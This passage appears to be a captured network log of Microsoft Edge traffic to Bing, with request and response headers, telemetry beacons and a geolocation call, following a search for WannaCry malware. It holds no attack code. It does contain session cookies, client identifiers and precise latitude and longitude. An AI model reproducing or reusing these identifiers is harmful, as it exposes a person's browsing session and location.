sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0

Response

HTTP/2.0 200

cache-control: private
content-length: 25
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb119724ffdbe06454e340ab293
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-in1QlYgZWlOFlVTmYu3TQNnLorlxvjWxQd6XGjEiZU0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 532ACAC5D4984FFE92D6D0DF1737F825 Ref B: LON601060105054 Ref C: 2024-10-17T21:03:45Z
date: Thu, 17 Oct 2024 21:03:45 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:45 GMT; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:45 GMT; path=/; secure; SameSite=None
set-cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:45 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.1491089a
GET

https://www.bing.com/geolocation/write?isDevLoc=false&lat=52.47917556762695&lon=-1.9018261432647705&dispName=Birmingham%252C%2520West%2520Midlands&isEff=1&effLocType=1&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /geolocation/write?isDevLoc=false&lat=52.47917556762695&lon=-1.9018261432647705&dispName=Birmingham%252C%2520West%2520Midlands&isEff=1&effLocType=1&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 512
content-type: image/svg+xml
content-md5: G0HPjgI1nZPfetni3YDkOw==
last-modified: Tue, 24 Sep 2024 06:17:12 GMT
etag: 0x8DCDC608780CE8B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f5f97b5b-c01e-002e-02f1-176a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=248715
expires: Sun, 20 Oct 2024 18:09:00 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199025.14910a69
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.6%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024857%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.6%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199024772%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024857%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 349
content-type: image/svg+xml
content-md5: iRh5eBPrKqjGuvgWi/nStw==
last-modified: Tue, 24 Sep 2024 06:02:04 GMT
etag: 0x8DCDC5E6A2D8636
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 334507b6-a01e-0035-6955-1944c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=387002
expires: Tue, 22 Oct 2024 08:33:47 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c2777b5c.1729199025.14910a6a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024922%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a6b
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a67
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: SRCHUSR=DOB=20241017
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199025.14910a68
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A674%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024947%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024961%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1729199024967%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199024926%2C%22Name%22%3A674%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024947%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024961%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024963%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1729199024964%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP